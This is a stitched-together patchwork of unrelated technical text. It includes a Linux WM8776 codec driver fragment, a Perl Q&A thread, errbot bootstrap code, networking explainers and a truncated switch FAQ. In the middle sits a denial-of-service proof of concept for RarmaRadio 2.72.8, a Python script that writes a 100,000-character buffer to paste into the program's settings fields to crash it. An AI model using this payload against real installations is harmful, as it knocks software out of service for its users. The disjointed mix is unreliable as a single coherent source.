2) Hosts on the same network segment but in different VLANs can communicate with each other after intra-VLAN proxy ARP is configured.
3) Hosts on different network segments but in the same VLAN can communicate after VLANIF interfaces are configured.
4) Hosts on different network segments and in different VLANs can communicate after VLAN aggregation is configured.
Other related questions:
USG2000 initial settings and subnet mask allocation
The subnet mask of the USG2000 specifies the bits, in the IP address, used for the network or subnet ID as well as for the host ID. The AND operation is performed for the corresponding bits of the 32-bit IP address and the subnet mask, to determine the network ID corresponding to the IP address. Assume that the IP address is 10.1.1.2 and the subnet mask is 255.255.0.0. The result of the AND operation performed for the corresponding bits of the IP address and the subnet mask, that is, 10.1.0.0, is the network address.
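The AND operation described above can be reproduced with Python's standard ipaddress module, using the same example values:

```python
import ipaddress

# IP 10.1.1.2 with subnet mask 255.255.0.0, as in the example above.
iface = ipaddress.ip_interface('10.1.1.2/255.255.0.0')

# The network address is the bitwise AND of the address and the mask.
print(iface.network.network_address)  # prints: 10.1.0.0
```

Each bit set in the mask selects the corresponding bit of the address for the network ID; the remaining bits form the host ID.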
How to change an interface IP address on an S series switches
You can delete or change an interface IP address on an S series switches (except the S1700) as follows: - To delete the IP address of an interface, run the undo ip address [ ip-address { mask | mask-length } ] command in the interface view. For example: [HUAWEI] interface Vlanif 100 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.1.1.1 255.255.255.0 # [HUAWEI-Vlanif100] undo ip address [HUAWEI-Vlanif100] display this # interface Vlanif100 # - To change the IP address or subnet mask of an interface, run the ip address ip-address { mask | mask-length } command in the interface view. For example: [HUAWEI] interface Vlanif 100 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.1.1.1 255.255.255.0 # [HUAWEI-Vlanif100] ip address 10.2.1.1 255.255.0.0 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.2.1.1 255.255.0.0 #
S series switch subnet network address if can be used as host address
S series switches (except S1700) network address of the subnet can not be the host address. If the host address is configured, an error message will appear:Error:The specified IP address is invalid.
A fault occurs on an S series switch when the network IP address/mask and host IP address/mask are configured. Why
Question: Why a fault occurs when I configure the network IP address/mask and host IP address/mask? Answer: You may solve the problem as follows: Ensure that the host is a part of the same network and the mask is correct. Ensure that the IP address and mask of the host can be combined to a network IP address. Ensure that the IP address of the host is unique on the network. Ensure that the IP address of the network is unique in the area.
Tony Power - 1 year ago
Python Question
Python: Comparing empty string to False is False, why?
If
not ''
evaluates to
True
, why does
'' == False
evaluates to
False
?
For example, the "voids" of the other types (e.g. 0, 0.0) will return
True
when compared to
False
:
>>> 0 == False
True
>>> 0.0 == False
True
Thanks
Answer Source
In the context of Boolean operations, and also when expressions are used by control flow statements, the following values are interpreted as false: False, None, numeric zero of all types, and empty strings and containers (including strings, tuples, lists, dictionaries, sets and frozensets). All other values are interpreted as true. User-defined objects can customize their truth value by providing a __bool__() method.
The operator not yields True if its argument is false, False otherwise.
https://docs.python.org/3/reference/expressions.html#boolean-operations
But:
The operators <, >, ==, >=, <=, and != compare the values of two objects. The objects do not need to have the same type.
...
Because all types are (direct or indirect) subtypes of object, they inherit the default comparison behavior from object. Types can customize their comparison behavior by implementing rich comparison methods like __lt__() ...
https://docs.python.org/3/reference/expressions.html#comparisons
So, the technical implementation answer is that it behaves the way it does because not and == use different comparisons. not uses __bool__, the "truth value" of an object, while == uses __eq__, the direct comparison of one object to another. So it's possible to ask an object whether it considers itself to be truthy or falsey, and separately from that ask it whether it considers itself to be equal to another object or not. The default implementations for that are arranged in a way that two objects can both consider themselves falsey yet not consider themselves equal to one another.
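The distinction between the two comparisons can be verified directly at the interpreter:

```python
# `not` asks for the truth value (__bool__), `==` asks for equality (__eq__).
print(not '')             # True  — the empty string is falsey
print('' == False)        # False — a str never compares equal to the bool False
print(bool('') == False)  # True  — comparing truth values explicitly
print(0 == False)         # True  — bool is a subclass of int, so False == 0
```

So `''` is falsey without being *equal* to `False`, while `0 == False` holds only because `bool` is an `int` subtype whose `False` has the value 0.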
Files generated during replay
This section describes what occurs when a Vuser script is replayed, and describes the files that are created.
1. The options.txt file is created. This file includes command line parameters to the preprocessor.
Example of options.txt file
-DCCI
-D_IDA_XL
-DWINNT
-Ic:\tmp\Vuser (name and location of Vuser include files)
-IE:\LRUN45B2\include (name and location of include files)
-ec:\tmp\Vuser\logfile.log (name and location of output logfile)
c:\tmp\Vuser\VUSER.c (name and location of file to be processed)
2. The file Vuser.c is created. This file contains 'includes' to all the relevant .c and .h files.
Example of Vuser.c file
#include "E:\LRUN45B2\include\lrun.h"
#include "c:\tmp\web\init.c"
#include "c:\tmp\web\run.c"
#include "c:\tmp\web\end.c"
3. The C preprocessor cpp.exe is invoked in order to 'fill in' any macro definitions, precompiler directives, and so on, from the development files.
The following command line is used:
cpp -foptions.txt
4. The file pre_cci.c is created which is also a C file (pre_cci.c is defined in the options.txt file). The file logfile.log (also defined in options.txt) is created containing any output of this process. This file should be empty if there are no problems with the preprocessing stage. If the file is not empty then it is almost certain that the next stage of compilation will fail due to a fatal error.
5. The cci.exe C compiler is now invoked to create a platform-dependent pseudo-binary file (.ci) to be used by the Vuser driver program that will interpret it at runtime. The cci takes the pre_cci.c file as input.
6. The file pre_cci.ci is created as follows:
cci -errout c:\tmp\Vuser\logfile.log -c pre_cci.
7. The file logfile.log is the log file containing output of the compilation.
8. The file pre_cci.ci is now renamed to Vuser.ci.
Since the compilation can contain both warnings and errors, and since the driver does not know the results of this process, the driver first checks if there are entries in the logfile.log file. If there are, it then checks if the file Vuser.ci has been built. If the file size is not zero, it means that cci succeeded in compiling; if not, the compilation has failed and an error message is given.
9. The relevant driver is now run, taking both the .usr file and the Vuser.ci file as input. For example:
mdrv.exe -usr c:\tmp\Vuser\.usr -out c:\tmp\Vuser -file c:\tmp\Vuser\Vuser.ci
The .usr file is needed since it tells the driver program which database is being used. This determines which libraries need to be loaded for the run.
10. If there is an existing replay log file, output.txt, (see the following entry), the log file is copied to output.bak.
11. The output.txt file is created (in the path defined by the 'out' variable). This file contains the output messages that were generated during the script replay. These are the same messages that appear in the Replay view of VuGen's Output pane.
Powershell; Folder Report with File Count and Size
I was recently asked what tool would be best to report the number of items in, and the size of, every folder in a particular file share. As an IT Architect I have numerous tools at my disposal that would be able to acquire the data my business partner needed. A few lines of PowerShell was the easiest to implement.
If you’ve used PowerShell for long you already know that Get-ChildItem is the cmdlet to retrieve things under a parent. Files, Folders, Items, you can list them all with GCI. Open PowerShell and type GCI then press enter; depending on your PowerShell profile settings, you should see a list of all your user profile sub folders. This cmdlet will form the basis of our report script.
gci
Of course, the full solution is a little more complicated than that. To generate a useful report we’ll use the Get-ChildItem command to get a list of folders in our path. Then we’ll loop through each folder with the same command again to get a list of the files.
We’ll build an array that contains the count and length (size) properties of each file. Finally we’ll export that array to a csv file in your documents folder. With a little more effort you could generate an HTML report and upload it to a web page or embed it in an email. See some of my other articles for how.
# Get-FileReport.ps1
#Author: Kevin Trent, Whatdouknow.com
#Right click .ps1 file and Open with PowerShell
#Enter Filepath or share path.
$location = Read-Host "Enter Top Level File Path"
$folders = Get-ChildItem -Path $location -Recurse -Directory
$array = @()
foreach ($folder in $folders)
{
$foldername = $folder.FullName
# Find files in sub-folders
$files = Get-ChildItem $foldername -Attributes !Directory
# Calculate size in MB for files
$size = $Null
$files | ForEach-Object -Process {
$size += $_.Length
}
$sizeinmb = [math]::Round(($size / 1mb), 1)
# Add pscustomobjects to array
$array += [pscustomobject]@{
Folder = $foldername
Count = $files.count
'Size(MB)' = $sizeinmb
}
}
# Generate Report Results in your Documents Folder
$array|Export-Csv -Path $env:USERPROFILE\documents\file_report.csv -NoTypeInformation
12 Comments
1. Hi,
Nice script but i have an error :
Get-ChildItem : The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name
must be less than 248 characters.
1. That isn’t an error caused by the script. Somewhere on the system you ran it on is a file (or files) violating the MAX_PATH system limit. One of the easiest ways to deal with it is to move the files into a shorter folder structure. There are also several utility apps out there that can help you.
1. Yes, it’s a Windows limitation…
But I have seen scripts that avoid the error by using the robocopy command in their script…
2. Hi Kevin,
Great post and a great script that has helped me, however some sub-folders (in fact a lot) in the directories I run this against are empty.
Is there a way to not write empty (0 files) folders to the CSV log file?
I guess on the flipside to help other people, is also the opposite and to only report empty folders.
Thanks Darren
1. My apologies, I just noticed that WordPress did not publish my reply to you. The answer is yes but not by modifying the export itself. Export-CSV assumes that you have everything the way you want it before you invoke the command. Swap out the section below and the new If statement will filter out 0 MB items except when they are the parent folder of something populated.
# Add pscustomobjects to array
If ($sizeinmb -ne 0) {
$array += [pscustomobject]@{
Folder = $foldername
Count = $files.count
'Size(MB)' = $sizeinmb}
}
}
3. Wow, a great script, and so cleverly presented that even a noob can make sense of it; great potential for learning (should one be teachable).
I am puzzled by the output: my result is a single line for each of the top-level folders in the target directory (appropriate file and file size numbers) but although the script calls for -Recurse, no child folders are reported. What am I missing?
Thanks in advance for any hints and suggestions!
4. Nice teaching presentation, and a bit more robust than most folder, file count scripts.
I have a problem with the output failing to include subfolders’ files. I’ve read of ‘-Recurse’ wrecking the output when collecting both directory and file information (and being a total noob, am hesitant to experiment with your code!) Was this expected to return values for folders and subfolders (some of the folders contain only folders—not my design!), or have I expected some magic the script isn’t designed to provide?
5. Hi Kevin
Is it possible to update a script to provide Modified Date, Date Created, Item type folder, security permissions at the folder level
Like
6. HI Kevin,
Great script. Is it possible to update a script to provide below fields
Modified Date , Date Created, Item type folder, security permissions at the folder level (including nested folders)
path: root/drivers/usb/storage/transport.c
/*
* Most of this source has been derived from the Linux and
* U-Boot USB Mass Storage driver implementations.
*
* Adapted for barebox:
* Copyright (c) 2011, AMK Drives & Controls Ltd.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*
*/
#include <common.h>
#include <clock.h>
#include <scsi.h>
#include <errno.h>
#include <dma.h>
#undef USB_STOR_DEBUG
#include "usb.h"
#include "transport.h"
/* The timeout argument of usb_bulk_msg() is actually ignored
and the timeout is hardcoded in the host driver */
#define USB_BULK_TO 5000
static __u32 cbw_tag = 0;
/* direction table -- this indicates the direction of the data
* transfer for each command code (bit-encoded) -- 1 indicates input
* note that this doesn't work for shared command codes
*/
static const unsigned char us_direction[256/8] = {
0x28, 0x81, 0x14, 0x14, 0x20, 0x01, 0x90, 0x77,
0x0C, 0x20, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x40, 0x09, 0x01, 0x80, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
#define US_DIRECTION(x) ((us_direction[x>>3] >> (x & 7)) & 1)
/*
* Bulk only transport
*/
/* Clear a stall on an endpoint - special for bulk-only devices */
static int usb_stor_Bulk_clear_endpt_stall(struct us_data *us, unsigned int pipe)
{
return usb_clear_halt(us->pusb_dev, pipe);
}
/* Determine what the maximum LUN supported is */
int usb_stor_Bulk_max_lun(struct us_data *us)
{
int len, ret = 0;
unsigned char *iobuf = dma_alloc(1);
/* issue the command */
iobuf[0] = 0;
len = usb_control_msg(us->pusb_dev,
usb_rcvctrlpipe(us->pusb_dev, 0),
US_BULK_GET_MAX_LUN,
USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_INTERFACE,
0, us->ifnum, iobuf, 1, USB_CNTL_TIMEOUT);
US_DEBUGP("GetMaxLUN command result is %d, data is %d\n",
len, (int)iobuf[0]);
/* if we have a successful request, return the result */
if (len > 0)
ret = iobuf[0];
dma_free(iobuf);
/*
* Some devices don't like GetMaxLUN. They may STALL the control
* pipe, they may return a zero-length result, they may do nothing at
* all and timeout, or they may fail in even more bizarrely creative
* ways. In these cases the best approach is to use the default
* value: only one LUN.
*/
return ret;
}
int usb_stor_Bulk_transport(ccb *srb, struct us_data *us)
{
struct bulk_cb_wrap cbw;
struct bulk_cs_wrap csw;
int actlen, data_actlen;
int result;
unsigned int residue;
unsigned int pipein = usb_rcvbulkpipe(us->pusb_dev, us->recv_bulk_ep);
unsigned int pipeout = usb_sndbulkpipe(us->pusb_dev, us->send_bulk_ep);
int dir_in = US_DIRECTION(srb->cmd[0]);
srb->trans_bytes = 0;
/* set up the command wrapper */
cbw.Signature = cpu_to_le32(US_BULK_CB_SIGN);
cbw.DataTransferLength = cpu_to_le32(srb->datalen);
cbw.Flags = (dir_in ? US_BULK_FLAG_IN : US_BULK_FLAG_OUT);
cbw.Tag = ++cbw_tag;
cbw.Lun = srb->lun;
cbw.Length = srb->cmdlen;
/* copy the command payload */
memcpy(cbw.CDB, srb->cmd, cbw.Length);
/* send it to out endpoint */
US_DEBUGP("Bulk Command S 0x%x T 0x%x L %d F %d Trg %d LUN %d CL %d\n",
le32_to_cpu(cbw.Signature), cbw.Tag,
le32_to_cpu(cbw.DataTransferLength), cbw.Flags,
(cbw.Lun >> 4), (cbw.Lun & 0x0F),
cbw.Length);
result = usb_bulk_msg(us->pusb_dev, pipeout, &cbw, US_BULK_CB_WRAP_LEN,
&actlen, USB_BULK_TO);
US_DEBUGP("Bulk command transfer result=%d\n", result);
if (result < 0) {
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
/* DATA STAGE */
/* send/receive data payload, if there is any */
mdelay(1);
data_actlen = 0;
if (srb->datalen) {
unsigned int pipe = dir_in ? pipein : pipeout;
result = usb_bulk_msg(us->pusb_dev, pipe, srb->pdata,
srb->datalen, &data_actlen, USB_BULK_TO);
US_DEBUGP("Bulk data transfer result 0x%x\n", result);
/* special handling of STALL in DATA phase */
if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("DATA: stall\n");
/* clear the STALL on the endpoint */
result = usb_stor_Bulk_clear_endpt_stall(us, pipe);
}
if (result < 0) {
US_DEBUGP("Device status: %lx\n", us->pusb_dev->status);
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
}
/* STATUS phase + error handling */
US_DEBUGP("Attempting to get CSW...\n");
result = usb_bulk_msg(us->pusb_dev, pipein, &csw, US_BULK_CS_WRAP_LEN,
&actlen, USB_BULK_TO);
/* did the endpoint stall? */
if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("STATUS: stall\n");
/* clear the STALL on the endpoint */
result = usb_stor_Bulk_clear_endpt_stall(us, pipein);
if (result >= 0) {
US_DEBUGP("Attempting to get CSW...\n");
result = usb_bulk_msg(us->pusb_dev, pipein,
&csw, US_BULK_CS_WRAP_LEN,
&actlen, USB_BULK_TO);
}
}
if (result < 0) {
US_DEBUGP("Device status: %lx\n", us->pusb_dev->status);
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
/* check bulk status */
residue = le32_to_cpu(csw.Residue);
US_DEBUGP("Bulk Status S 0x%x T 0x%x R %u Stat 0x%x\n",
le32_to_cpu(csw.Signature), csw.Tag, residue, csw.Status);
if (csw.Signature != cpu_to_le32(US_BULK_CS_SIGN)) {
US_DEBUGP("Bad CSW signature\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Tag != cbw_tag) {
US_DEBUGP("Mismatching tag\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Status >= US_BULK_STAT_PHASE) {
US_DEBUGP("Status >= phase\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_ERROR;
} else if (residue > srb->datalen) {
US_DEBUGP("residue (%uB) > req data (%luB)\n",
residue, srb->datalen);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Status == US_BULK_STAT_FAIL) {
US_DEBUGP("FAILED\n");
return USB_STOR_TRANSPORT_FAILED;
}
srb->trans_bytes = min(srb->datalen - residue, (ulong)data_actlen);
return 0;
}
/* This issues a Bulk-only Reset to the device in question, including
* clearing the subsequent endpoint halts that may occur.
*/
int usb_stor_Bulk_reset(struct us_data *us)
{
int result;
int result2;
unsigned int pipe;
US_DEBUGP("%s called\n", __func__);
/* issue the command */
result = usb_control_msg(us->pusb_dev,
usb_sndctrlpipe(us->pusb_dev, 0),
US_BULK_RESET_REQUEST,
USB_TYPE_CLASS | USB_RECIP_INTERFACE,
0, us->ifnum, 0, 0, USB_CNTL_TIMEOUT);
if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("Soft reset stalled: %d\n", result);
return result;
}
mdelay(150);
/* clear the bulk endpoints halt */
US_DEBUGP("Soft reset: clearing %s endpoint halt\n", "bulk-in");
pipe = usb_rcvbulkpipe(us->pusb_dev, us->recv_bulk_ep);
result = usb_clear_halt(us->pusb_dev, pipe);
mdelay(150);
US_DEBUGP("Soft reset: clearing %s endpoint halt\n", "bulk-out");
pipe = usb_sndbulkpipe(us->pusb_dev, us->send_bulk_ep);
result2 = usb_clear_halt(us->pusb_dev, pipe);
mdelay(150);
if (result >= 0)
result = result2;
US_DEBUGP("Soft reset %s\n", ((result < 0) ? "failed" : "done"));
return result;
}
rust-ini 0.16.0
An Ini configuration file parsing library in Rust
Documentation
Ini parser for Rust
use ini::Ini;
let mut conf = Ini::new();
conf.with_section(Some("User"))
.set("name", "Raspberry树莓")
.set("value", "Pi");
conf.with_section(Some("Library"))
.set("name", "Sun Yat-sen U")
.set("location", "Guangzhou=world");
conf.write_to_file("conf.ini").unwrap();
let i = Ini::load_from_file("conf.ini").unwrap();
for (sec, prop) in i.iter() {
println!("Section: {:?}", sec);
for (k, v) in prop.iter() {
println!("{}:{}", k, v);
}
}
evilReiko - 6 months ago
Node.js Question
Node.js + MongoDB: insert one and return the newly inserted document
I'm wondering if there is a way to insert new document and return it in one in one go.
This is what I'm currently using:
db.collection('mycollection').insertOne(options, function (error, response) {
...
});
Answer
The response contains information about whether the insert succeeded and the number of records inserted, but if you want the inserted document back you can use response.ops:
db.collection('mycollection').insertOne(doc, function (error, response) {
if(error) {
console.log('Error occurred while inserting');
// return
} else {
console.log('inserted record', response.ops[0]);
// return
}
});
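Note that `response.ops` belongs to the 2.x/3.x versions of the Node.js MongoDB driver; it was removed in 4.x, where `insertOne` resolves with only `insertedId`. As a rough sketch of the shape (the object and values below are made up to mimic a 2.x response, not real driver output):

```javascript
// Stub shaped like a 2.x driver insertOne response; a real one comes
// from the insertOne callback, not from a literal like this.
const response = {
  result: { ok: 1, n: 1 },
  insertedCount: 1,
  ops: [{ _id: 'abc123', name: 'example' }]
};

// ops is an array of the documents as inserted; the new doc is ops[0].
const insertedDoc = response.ops[0];
console.log(insertedDoc._id); // 'abc123'
```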
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import os
import shutil
import sys
def Main():
  parser = argparse.ArgumentParser(description='Create Mac Framework symlinks')
  parser.add_argument('--framework', action='store', type=str, required=True)
  parser.add_argument('--version', action='store', type=str)
  parser.add_argument('--contents', action='store', type=str, nargs='+')
  parser.add_argument('--stamp', action='store', type=str, required=True)
  args = parser.parse_args()

  VERSIONS = 'Versions'
  CURRENT = 'Current'

  # Ensure the Foo.framework/Versions/A/ directory exists and create the
  # Foo.framework/Versions/Current symlink to it.
  if args.version:
    try:
      os.makedirs(os.path.join(args.framework, VERSIONS, args.version), 0o755)
    except OSError as e:
      if e.errno != errno.EEXIST:
        raise e
    _Relink(os.path.join(args.version),
            os.path.join(args.framework, VERSIONS, CURRENT))

  # Establish the top-level symlinks in the framework bundle. The dest of
  # the symlinks may not exist yet.
  if args.contents:
    for item in args.contents:
      _Relink(os.path.join(VERSIONS, CURRENT, item),
              os.path.join(args.framework, item))

  # Write out a stamp file.
  if args.stamp:
    with open(args.stamp, 'w') as f:
      f.write(str(args))

  return 0

def _Relink(dest, link):
  """Creates a symlink to |dest| named |link|. If |link| already exists,
  it is overwritten."""
  try:
    os.remove(link)
  except OSError as e:
    if e.errno != errno.ENOENT:
      shutil.rmtree(link)
  os.symlink(dest, link)

if __name__ == '__main__':
  sys.exit(Main())
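The overwrite-if-exists behavior of `_Relink` can be tried in isolation. The following standalone sketch (file names are arbitrary, and it assumes a POSIX system where `os.symlink` needs no special privileges) repeats the same remove-then-symlink pattern in a temporary directory:

```python
import errno
import os
import tempfile

def relink(dest, link):
    """Create a symlink to dest named link, overwriting any existing link."""
    try:
        os.remove(link)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise
    os.symlink(dest, link)

d = tempfile.mkdtemp()
link = os.path.join(d, "Current")
relink("A", link)
relink("B", link)  # second call overwrites the first symlink
print(os.readlink(link))  # B
```

Calling it twice on the same link name does not raise, which is exactly what lets the build step be re-run without cleaning first.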
Date sub - interval mysql
Hello. I am trying to search some records based on an interval:
$rates = ExchangeRate::find(array(
"exchange_date BETWEEN DATE_SUB(DATE(:date:),INTERVAL 3 DAY) AND :date:",
"bind" => array(
'date' => $date
),
"cache" => array(
"key" => "exchange_rate_$date",
"lifetime" => 3600 * 24
)
));
This will end up with the following error:
"Syntax error, unexpected token INTEGER(3), near to ' DAY) AND :date:', when parsing: SELECT [App\\Core\\Models\\Exchange\\ExchangeRate].* FROM [App\\Core\\Models\\Exchange\\ExchangeRate] WHERE exchange_date BETWEEN DATE_SUB(DATE(':date:'),INTERVAL 3 DAY) AND :date: (172
I have tried to bind the entire mysql function as \Phalcon\Db\RawValue(), but also without success:
new \Phalcon\Db\RawValue("DATE_SUB(DATE($date),INTERVAL 3 DAY)");
• I know how how to add and susbtract days via PHP, please comment strictly related to the ORM.
Thanks you.
Interval is not supported since it's a MySQL only feature
Ok. So I should rely on raw SQL or PHP in this case, correct?
I'd +1 a request for getting this functionality added. In my opinion MySQL is by far the most commonly used DBMS for web applications, so some effort should be expended to match functionality provided by MySQL.
@Calin - It doesn't look like you NEED to use the MySQL function. Can't you just do the date math in PHP?:
$date2 = strtotime('-3 days', $date);
$rates = ExchangeRate::find(array(
"exchange_date BETWEEN :date2: AND :date:",
"bind" => array(
'date' => $date,
'date2' => $date2
),
"cache" => array(
"key" => "exchange_rate_$date",
"lifetime" => 3600 * 24
)
));
@quasipickle, after Phalcon's answer, I am using PHP. But in general, it would be nice to be able to use more MySQL built-in functions. On the other hand, if your app grows and you need to switch from MySQL, it is a good approach NOT to rely on or use the built-in functions. I am also not sure why, if I am using Phalcon\Db\Adapter\Pdo\Mysql, I can't use MySQL at its full power. Some answers on these "issues" would be appreciated :)
I consider the "what if you change your RDMS" problem to be a non-issue. How many times have you changed the database back-end on one of your apps? If you do need to switch from MySQL to, say, Oracle because your app suddenly has 1 million+ users, you're obviously going to be revisiting the code anyway.
It seems like the adapter still has to parse PHQL statements into statements MySQL will be able to read. I agree though - if a separate adapter exists for a particular brand of SQL, why not provide all the functionality for that particular brand.
I have added an extended MySQL dialect to the incubator that introduces handling of some specific PHQL functions that add support for INTERVAL-like expressions and fulltext searches:
Changing the default dialect:
$di->set('db', function() use ($config) {
return new \Phalcon\Db\Adapter\Pdo\Mysql(array(
"host" => $config->database->host,
"username" => $config->database->username,
"password" => $config->database->password,
"dbname" => $config->database->name,
"dialectClass" => '\Phalcon\Db\Dialect\MysqlExtended'
));
});
Using the custom functions:
// SELECT `customers`.`created_at` - INTERVAL 7 DAY FROM `customers`
$data = $this->modelsManager->executeQuery(
'SELECT created_at - DATE_INTERVAL(7, "DAY") FROM App\Models\Customers'
);
// SELECT `customers`.`id`, `customers`.`name` FROM `customers` WHERE MATCH(`customers`.`name`, `customers`.`description`) AGAINST ("+CEO")
$data = $this->modelsManager->executeQuery(
'SELECT id, name FROM App\Models\Customers WHERE FULLTEXT_MATCH(name, description, "+CEO")'
);
// SELECT `customers`.`id`, `customers`.`name` FROM `customers` WHERE MATCH(`customers`.`name`, `customers`.`description`) AGAINST ("+CEO" IN BOOLEAN MODE)
$data = $this->modelsManager->executeQuery(
'SELECT id, name FROM App\Models\Customers WHERE FULLTEXT_MATCH_BMODE(name, description, "+CEO")'
);
https://github.com/phalcon/incubator/tree/master/Library/Phalcon/Db#dialectmysqlextended
@quasipickle: the issue, when using PHP's date, is that you don't rely on the MySQL server's date. If the 2 servers are not in sync, you're running into a lot of trouble. You must use the MySQL's server's date. Even if the 2 are on the same server, NOW() is not exactly the same between your PHP statement and the effective request on MySQL.
@phalcon: thanks for implementing this.
@phalcon: you can't implement this on phalcon 2.0.0, as the getSqlExpression is «final». Is there any other workaround?
When I add this line
"dialectClass" => '\Phalcon\Db\Dialect\MysqlExtended'
PHP return the error:
Fatal error: Class 'Phalcon\Db\Dialect\MysqlExtended' not found
How can I fix this issue?
This thread is 3 years old. If you have a new question, please start a new thread.
|
__label__pos
| 0.9293 |
Monday, July 14, 2014
A Multi-Table Trick to Speed up Single-Table UPDATE/DELETE Statements
This post appeared first on mysqlserverteam.com
In MySQL, query optimization of single-table UPDATE/DELETE statements is more limited than for SELECT statements. I guess the main reason for this is to limit the optimizer overhead for very simple statements. However, this also means that optimization opportunities are sometimes missed for more complex UPDATE/DELETE statements.
Example
Using the DBT-3 database, the following SQL statement will increase prices by 10% on parts from suppliers in the specified country:
UPDATE part
SET p_retailprice = p_retailprice*1.10
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
Visual EXPLAIN in MySQL Workbench shows that the optimizer will choose the following execution plan for this UPDATE statement:
[Figure: Visual EXPLAIN plan for the UPDATE statement with subquery]
That is, for every row in the part table, MySQL will check if this part is supplied by a supplier of the requested nationality. Consider the following similar SELECT statement:
SELECT * FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
In MySQL 5.6, the query optimizer will apply semi-join transformation to this query. Hence, the execution plan is quite different from the similar UPDATE statement:
[Figure: Visual EXPLAIN plan for the SELECT after semi-join transformation]
As you can see, there is no sub-query in this plan. The query has been transformed into a three-way join. The great advantage of this semi-join transformation is that the optimizer is now free to re-arrange the order of the tables to be joined. Instead of having to go through all 179,000 parts, it will now start with the estimated 414 suppliers from the given country and find all parts supplied by them. This is obviously more efficient, and it would be good if MySQL would use the same approach for the UPDATE statement.
The Multi-Table Trick
Unlike single-table UPDATE statements, the MySQL Optimizer will use all available optimizations for multi-table UPDATE statements. This means that by rewriting the query as follows, the semi-join optimizations will apply:
UPDATE part, (SELECT 1) dummy
SET p_retailprice = p_retailprice*1.10
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
Notice the extra dummy table in the first line. Here is what happens when I execute the single-table and multi-table variants on a DBT-3 database (scale factor 1):
mysql> UPDATE part SET p_retailprice = p_retailprice*1.10 WHERE p_partkey IN (SELECT ps_partkey FROM partsupp JOIN supplier ON ps_suppkey = s_suppkey WHERE s_nationkey = 4);
Query OK, 31097 rows affected, 28003 warnings (2.63 sec)
Rows matched: 31097 Changed: 31097 Warnings: 28003
mysql> ROLLBACK;
Query OK, 0 rows affected (0.20 sec)
mysql> UPDATE part, (SELECT 1) dummy SET p_retailprice = p_retailprice*1.10 WHERE p_partkey IN (SELECT ps_partkey FROM partsupp JOIN supplier ON ps_suppkey = s_suppkey WHERE s_nationkey = 4);
Query OK, 31097 rows affected, 28003 warnings (0.40 sec)
Rows matched: 31097 Changed: 31097 Warnings: 28003
As you can see, execution time is reduced from 2.63 seconds to 0.40 seconds by using this trick. (I had executed both statements several times before, so the reported execution times are for a steady state with all accessed data in memory.)
Multi-Table DELETE
The same trick can be used for DELETE statements. Instead of the single-table variant,
DELETE FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
you can use the equivalent multi-table variant:
DELETE part FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
This rewrite gives a similar performance improvement as reported for the above UPDATE statement.
My first Web Scraping project – Analyzing Flipkart Product Reviews using Text Mining
E-commerce websites generate large amounts of textual data. These firms hire data science professionals to refine this unstructured data and gather meaningful insights from it that help them understand the end user better. For example, by analyzing product reviews Flipkart can understand how its products are perceived, and Netflix can learn how well users like its content; it is hard to imagine doing this kind of analysis without text analytics.
Topics we cover in this article:
• How to Extract Product reviews from Flipkart website
• Preprocessing of the Extracted reviews
• Extracting and Analyzing Positive reviews
• Extracting and Negative reviews
In this article, we will extract the reviews of Macbook air laptop from the Flipkart website and perform text analysis.
Hands-on implementation of Flipkart review scraping
#Importing required libraries
import requests
from bs4 import BeautifulSoup as bs
import re
import nltk
import matplotlib.pyplot as plt
from wordcloud import WordCloud
import os
Extracting reviews from Flipkart for MacBook Air
Here we are going to extract reviews of Macbook air laptops from the URL.
#Scraping review using beautifulsoup
macbook_reviews=[]
for i in range(1,30):
mac=[]
url="https://www.flipkart.com/apple-macbook-air-core-i5-5th-gen-8-gb-128-gb-ssd-mac-os-sierra-mqd32hn-a-a1466/product-reviews/itmevcpqqhf6azn3?pid=COMEVCPQBXBDFJ8C&page="+str(i)
response = requests.get(url)
soup = bs(response.content,"html.parser")# creating soup object to iterate over the extracted content
reviews = soup.findAll("div",attrs={"class","qwjRop"})# Extracting the content under specific tags
for i in range(len(reviews)):
mac.append(reviews[i].text)
macbook_reviews=macbook_reviews+mac
#here we saving the extracted data
with open("macbook.txt","w",encoding='utf8') as output:
output.write(str(macbook_reviews))
Up to here we extracted reviews from the website and stored them in a file named macbook.txt.
